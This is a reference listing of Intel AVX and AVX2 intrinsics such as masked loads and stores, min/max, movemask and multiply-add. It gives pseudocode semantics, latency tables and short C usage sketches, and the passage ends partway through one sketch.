__m256d _mm256_loadu2_m128d (double const* hiaddr, double const* loaddr)

Synopsis

__m256d _mm256_loadu2_m128d (double const* hiaddr, double const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of 2 packed double-precision (64-bit) floating-point elements) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
__m256i _mm256_loadu2_m128i (__m128i const* hiaddr, __m128i const* loaddr)

Synopsis

__m256i _mm256_loadu2_m128i (__m128i const* hiaddr, __m128i const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of integer data) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
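
The loadu2 helpers stitch two unrelated 128-bit memory locations into one 256-bit register. A minimal sketch (assumes a compiler that provides the composite _mm256_loadu2_m128 intrinsic; note the high-address pointer comes first):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    float lo[4] = { 1.f, 2.f, 3.f, 4.f };
    float hi[4] = { 5.f, 6.f, 7.f, 8.f };

    __m256 v = _mm256_loadu2_m128(hi, lo);   /* hiaddr first, loaddr second */

    float out[8];
    _mm256_storeu_ps(out, v);
    for (int k = 0; k < 8; k++) printf("%.0f ", out[k]);  /* 1 2 3 4 5 6 7 8 */
    printf("\n");
    return 0;
}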
vpmaddwd
__m256i _mm256_madd_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_madd_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaddwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply packed signed 16-bit integers in a and b, producing intermediate signed 32-bit integers. Horizontally add adjacent pairs of intermediate 32-bit integers, and pack the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i+16]*b[i+31:i+16] + a[i+15:i]*b[i+15:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
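
vpmaddwd is the usual core of a 16-bit integer dot product: each 32-bit lane of the result holds the sum of one adjacent pair of products. A sketch with a scalar tail reduction (illustrative data, assumes AVX2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    short a16[16], b16[16];
    for (int k = 0; k < 16; k++) { a16[k] = (short)(k + 1); b16[k] = 2; }

    __m256i a = _mm256_loadu_si256((const __m256i *)a16);
    __m256i b = _mm256_loadu_si256((const __m256i *)b16);
    __m256i prod = _mm256_madd_epi16(a, b);       /* eight 32-bit pair sums */

    int out[8], total = 0;
    _mm256_storeu_si256((__m256i *)out, prod);
    for (int k = 0; k < 8; k++) total += out[k];  /* reduce the eight sums  */
    printf("%d\n", total);                        /* 2*(1+...+16) = 272     */
    return 0;
}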
vpmaddubsw
__m256i _mm256_maddubs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_maddubs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaddubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Vertically multiply each unsigned 8-bit integer from a with the corresponding signed 8-bit integer from b, producing intermediate signed 16-bit integers. Horizontally add adjacent pairs of intermediate signed 16-bit integers, and pack the saturated results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_Int16( a[i+15:i+8]*b[i+15:i+8] + a[i+7:i]*b[i+7:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpmaskmovd
__m128i _mm_maskload_epi32 (int const* mem_addr, __m128i mask)

Synopsis

__m128i _mm_maskload_epi32 (int const* mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vpmaskmovd xmm, xmm, m128
CPUID Flags: AVX2

Description

Load packed 32-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovd
__m256i _mm256_maskload_epi32 (int const* mem_addr, __m256i mask)

Synopsis

__m256i _mm256_maskload_epi32 (int const* mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vpmaskmovd ymm, ymm, m256
CPUID Flags: AVX2

Description

Load packed 32-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovq
__m128i _mm_maskload_epi64 (__int64 const* mem_addr, __m128i mask)

Synopsis

__m128i _mm_maskload_epi64 (__int64 const* mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vpmaskmovq xmm, xmm, m128
CPUID Flags: AVX2

Description

Load packed 64-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpmaskmovq
__m256i _mm256_maskload_epi64 (__int64 const* mem_addr, __m256i mask)

Synopsis

__m256i _mm256_maskload_epi64 (__int64 const* mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vpmaskmovq ymm, ymm, m256
CPUID Flags: AVX2

Description

Load packed 64-bit integers from memory into dst using mask (elements are zeroed out when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vmaskmovpd
__m128d _mm_maskload_pd (double const * mem_addr, __m128i mask)

Synopsis

__m128d _mm_maskload_pd (double const * mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vmaskmovpd xmm, xmm, m128
CPUID Flags: AVX

Description

Load packed double-precision (64-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovpd
__m256d _mm256_maskload_pd (double const * mem_addr, __m256i mask)

Synopsis

__m256d _mm256_maskload_pd (double const * mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vmaskmovpd ymm, ymm, m256
CPUID Flags: AVX

Description

Load packed double-precision (64-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[mem_addr+i+63:mem_addr+i] ELSE dst[i+63:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovps
__m128 _mm_maskload_ps (float const * mem_addr, __m128i mask)

Synopsis

__m128 _mm_maskload_ps (float const * mem_addr, __m128i mask)
#include «immintrin.h»
Instruction: vmaskmovps xmm, xmm, m128
CPUID Flags: AVX

Description

Load packed single-precision (32-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
vmaskmovps
__m256 _mm256_maskload_ps (float const * mem_addr, __m256i mask)

Synopsis

__m256 _mm256_maskload_ps (float const * mem_addr, __m256i mask)
#include «immintrin.h»
Instruction: vmaskmovps ymm, ymm, m256
CPUID Flags: AVX

Description

Load packed single-precision (32-bit) floating-point elements from memory into dst using mask (elements are zeroed out when the high bit of the corresponding element is not set).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[mem_addr+i+31:mem_addr+i] ELSE dst[i+31:i] := 0 FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
Ivy Bridge 2
Sandy Bridge 2
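
A common use of vmaskmovps is reading the ragged tail of an array without touching memory past its end. The sketch below builds the mask from the number of remaining elements (illustrative; the mask construction uses the AVX2 compare _mm256_cmpgt_epi32):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    float data[5] = { 1.f, 2.f, 3.f, 4.f, 5.f };
    int n = 5;                                   /* elements left to process */

    /* lane j participates when j < n: that comparison sets the lane's sign bit */
    __m256i lane = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
    __m256i mask = _mm256_cmpgt_epi32(_mm256_set1_epi32(n), lane);

    __m256 v = _mm256_maskload_ps(data, mask);   /* lanes 5..7 are zeroed, not read */

    float out[8];
    _mm256_storeu_ps(out, v);
    for (int k = 0; k < 8; k++) printf("%.0f ", out[k]);  /* 1 2 3 4 5 0 0 0 */
    printf("\n");
    return 0;
}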
vpmaskmovd
void _mm_maskstore_epi32 (int* mem_addr, __m128i mask, __m128i a)

Synopsis

void _mm_maskstore_epi32 (int* mem_addr, __m128i mask, __m128i a)
#include «immintrin.h»
Instruction: vpmaskmovd m128, xmm, xmm
CPUID Flags: AVX2

Description

Store packed 32-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovd
void _mm256_maskstore_epi32 (int* mem_addr, __m256i mask, __m256i a)

Synopsis

void _mm256_maskstore_epi32 (int* mem_addr, __m256i mask, __m256i a)
#include «immintrin.h»
Instruction: vpmaskmovd m256, ymm, ymm
CPUID Flags: AVX2

Description

Store packed 32-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovq
void _mm_maskstore_epi64 (__int64* mem_addr, __m128i mask, __m128i a)

Synopsis

void _mm_maskstore_epi64 (__int64* mem_addr, __m128i mask, __m128i a)
#include «immintrin.h»
Instruction: vpmaskmovq m128, xmm, xmm
CPUID Flags: AVX2

Description

Store packed 64-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vpmaskmovq
void _mm256_maskstore_epi64 (__int64* mem_addr, __m256i mask, __m256i a)

Synopsis

void _mm256_maskstore_epi64 (__int64* mem_addr, __m256i mask, __m256i a)
#include «immintrin.h»
Instruction: vpmaskmovq m256, ymm, ymm
CPUID Flags: AVX2

Description

Store packed 64-bit integers from a into memory using mask (elements are not stored when the highest bit is not set in the corresponding element).

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
vmaskmovpd
void _mm_maskstore_pd (double * mem_addr, __m128i mask, __m128d a)

Synopsis

void _mm_maskstore_pd (double * mem_addr, __m128i mask, __m128d a)
#include «immintrin.h»
Instruction: vmaskmovpd m128, xmm, xmm
CPUID Flags: AVX

Description

Store packed double-precision (64-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovpd
void _mm256_maskstore_pd (double * mem_addr, __m256i mask, __m256d a)

Synopsis

void _mm256_maskstore_pd (double * mem_addr, __m256i mask, __m256d a)
#include «immintrin.h»
Instruction: vmaskmovpd m256, ymm, ymm
CPUID Flags: AVX

Description

Store packed double-precision (64-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] MEM[mem_addr+i+63:mem_addr+i] := a[i+63:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovps
void _mm_maskstore_ps (float * mem_addr, __m128i mask, __m128 a)

Synopsis

void _mm_maskstore_ps (float * mem_addr, __m128i mask, __m128 a)
#include «immintrin.h»
Instruction: vmaskmovps m128, xmm, xmm
CPUID Flags: AVX

Description

Store packed single-precision (32-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
vmaskmovps
void _mm256_maskstore_ps (float * mem_addr, __m256i mask, __m256 a)

Synopsis

void _mm256_maskstore_ps (float * mem_addr, __m256i mask, __m256 a)
#include «immintrin.h»
Instruction: vmaskmovps m256, ymm, ymm
CPUID Flags: AVX

Description

Store packed single-precision (32-bit) floating-point elements from a into memory using mask.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] MEM[mem_addr+i+31:mem_addr+i] := a[i+31:i] FI ENDFOR

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 1
Sandy Bridge 1
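
The store-side counterpart handles the same tail case on output: only the lanes selected by the mask are written, so nothing is stored past the end of the buffer. A minimal sketch (assumes AVX2 for the mask construction):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    float dst[5] = { 0 };
    int n = 5;

    __m256i lane = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
    __m256i mask = _mm256_cmpgt_epi32(_mm256_set1_epi32(n), lane);
    __m256  vals = _mm256_set1_ps(9.f);

    _mm256_maskstore_ps(dst, mask, vals);        /* only dst[0..4] are written */
    for (int k = 0; k < 5; k++) printf("%.0f ", dst[k]);    /* 9 9 9 9 9 */
    printf("\n");
    return 0;
}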
vpmaxsw
__m256i _mm256_max_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] > b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxsd
__m256i _mm256_max_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] > b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpmaxsb
__m256i _mm256_max_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] > b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxuw
__m256i _mm256_max_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 16-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] > b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmaxud
__m256i _mm256_max_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxud ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 32-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] > b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpmaxub
__m256i _mm256_max_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_max_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmaxub ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 8-bit integers in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] > b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vmaxpd
__m256d _mm256_max_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_max_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vmaxpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MAX(a[i+63:i], b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vmaxps
__m256 _mm256_max_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_max_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vmaxps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b, and store packed maximum values in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MAX(a[i+31:i], b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpminsw
__m256i _mm256_min_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] < b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminsd
__m256i _mm256_min_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] < b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminsb
__m256i _mm256_min_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] < b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminuw
__m256i _mm256_min_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminuw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 16-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 15 i := j*16 IF a[i+15:i] < b[i+15:i] dst[i+15:i] := a[i+15:i] ELSE dst[i+15:i] := b[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminud
__m256i _mm256_min_epu32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminud ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 32-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31:i] < b[i+31:i] dst[i+31:i] := a[i+31:i] ELSE dst[i+31:i] := b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpminub
__m256i _mm256_min_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_min_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpminub ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed unsigned 8-bit integers in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 31 i := j*8 IF a[i+7:i] < b[i+7:i] dst[i+7:i] := a[i+7:i] ELSE dst[i+7:i] := b[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vminpd
__m256d _mm256_min_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_min_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vminpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MIN(a[i+63:i], b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vminps
__m256 _mm256_min_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_min_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vminps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b, and store packed minimum values in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MIN(a[i+31:i], b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vmovddup
__m256d _mm256_movedup_pd (__m256d a)

Synopsis

__m256d _mm256_movedup_pd (__m256d a)
#include «immintrin.h»
Instruction: vmovddup ymm, ymm
CPUID Flags: AVX

Description

Duplicate even-indexed double-precision (64-bit) floating-point elements from a, and store the results in dst.

Operation

dst[63:0] := a[63:0] dst[127:64] := a[63:0] dst[191:128] := a[191:128] dst[255:192] := a[191:128] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vmovshdup
__m256 _mm256_movehdup_ps (__m256 a)

Synopsis

__m256 _mm256_movehdup_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovshdup ymm, ymm
CPUID Flags: AVX

Description

Duplicate odd-indexed single-precision (32-bit) floating-point elements from a, and store the results in dst.

Operation

dst[31:0] := a[63:32] dst[63:32] := a[63:32] dst[95:64] := a[127:96] dst[127:96] := a[127:96] dst[159:128] := a[191:160] dst[191:160] := a[191:160] dst[223:192] := a[255:224] dst[255:224] := a[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vmovsldup
__m256 _mm256_moveldup_ps (__m256 a)

Synopsis

__m256 _mm256_moveldup_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovsldup ymm, ymm
CPUID Flags: AVX

Description

Duplicate even-indexed single-precision (32-bit) floating-point elements from a, and store the results in dst.

Operation

dst[31:0] := a[31:0] dst[63:32] := a[31:0] dst[95:64] := a[95:64] dst[127:96] := a[95:64] dst[159:128] := a[159:128] dst[191:160] := a[159:128] dst[223:192] := a[223:192] dst[255:224] := a[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpmovmskb
int _mm256_movemask_epi8 (__m256i a)

Synopsis

int _mm256_movemask_epi8 (__m256i a)
#include «immintrin.h»
Instruction: vpmovmskb r32, ymm
CPUID Flags: AVX2

Description

Create mask from the most significant bit of each 8-bit element in a, and store the result in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[j] := a[i+7] ENDFOR

Performance

Architecture Latency Throughput
Haswell 3
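
A minimal sketch of the usual movemask pattern: compare 32 bytes against a needle byte, collect the per-byte sign bits into a 32-bit mask, and locate the first match with a trailing-zero count. Assumes AVX2 and a compiler providing __builtin_ctz; names are illustrative.

#include <immintrin.h>
#include <stdint.h>

int find_byte_32(const uint8_t *p, uint8_t c)
{
    __m256i block  = _mm256_loadu_si256((const __m256i *)p);
    __m256i needle = _mm256_set1_epi8((char)c);
    __m256i eq     = _mm256_cmpeq_epi8(block, needle);   /* 0xFF where bytes are equal */
    unsigned mask  = (unsigned)_mm256_movemask_epi8(eq); /* bit j = MSB of byte j */
    return mask ? __builtin_ctz(mask) : -1;              /* index of first match, or -1 */
}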
vmovmskpd
int _mm256_movemask_pd (__m256d a)

Synopsis

int _mm256_movemask_pd (__m256d a)
#include «immintrin.h»
Instruction: vmovmskpd r32, ymm
CPUID Flags: AVX

Description

Set each bit of mask dst based on the most significant bit of the corresponding packed double-precision (64-bit) floating-point element in a.

Operation

FOR j := 0 to 3 i := j*64 IF a[i+63] dst[j] := 1 ELSE dst[j] := 0 FI ENDFOR dst[MAX:4] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 2
Sandy Bridge 2
vmovmskps
int _mm256_movemask_ps (__m256 a)

Synopsis

int _mm256_movemask_ps (__m256 a)
#include «immintrin.h»
Instruction: vmovmskps r32, ymm
CPUID Flags: AVX

Description

Set each bit of mask dst based on the most significant bit of the corresponding packed single-precision (32-bit) floating-point element in a.

Operation

FOR j := 0 to 7 i := j*32 IF a[i+31] dst[j] := 1 ELSE dst[j] := 0 FI ENDFOR dst[MAX:8] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 2
Sandy Bridge 2
vmpsadbw
__m256i _mm256_mpsadbw_epu8 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_mpsadbw_epu8 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vmpsadbw ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Compute the sum of absolute differences (SADs) of quadruplets of unsigned 8-bit integers in a compared to those in b, and store the 16-bit results in dst. Eight SADs are performed for each 128-bit lane using one quadruplet from b and eight quadruplets from a. One quadruplet is selected from b starting at the offset specified in imm8. Eight quadruplets are formed from sequential 8-bit integers selected from a starting at the offset specified in imm8.

Operation

MPSADBW(a[127:0], b[127:0], imm8[2:0]) { a_offset := imm8[2]*32 b_offset := imm8[1:0]*32 FOR j := 0 to 7 i := j*8 k := a_offset+i l := b_offset tmp[i+15:i] := ABS(a[k+7:k] - b[l+7:l]) + ABS(a[k+15:k+8] - b[l+15:l+8]) + ABS(a[k+23:k+16] - b[l+23:l+16]) + ABS(a[k+31:k+24] - b[l+31:l+24]) ENDFOR RETURN tmp[127:0] } dst[127:0] := MPSADBW(a[127:0], b[127:0], imm8[2:0]) dst[255:128] := MPSADBW(a[255:128], b[255:128], imm8[5:3]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 2
vpmuldq
__m256i _mm256_mul_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_mul_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpmuldq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Multiply the low signed 32-bit integers from each packed 64-bit element in a and b, and store the signed 64-bit results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+31:i] * b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
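
A minimal sketch of the widening multiply: vpmuldq only reads the low (even-indexed) 32-bit element of each 64-bit lane, so it yields four signed 64-bit products per call. Assumes AVX2; buffer names are illustrative.

#include <immintrin.h>
#include <stdint.h>

void widen_mul_even(const int32_t *a, const int32_t *b, int64_t *out /* 4 results */)
{
    __m256i va = _mm256_loadu_si256((const __m256i *)a);  /* 8 x int32 */
    __m256i vb = _mm256_loadu_si256((const __m256i *)b);
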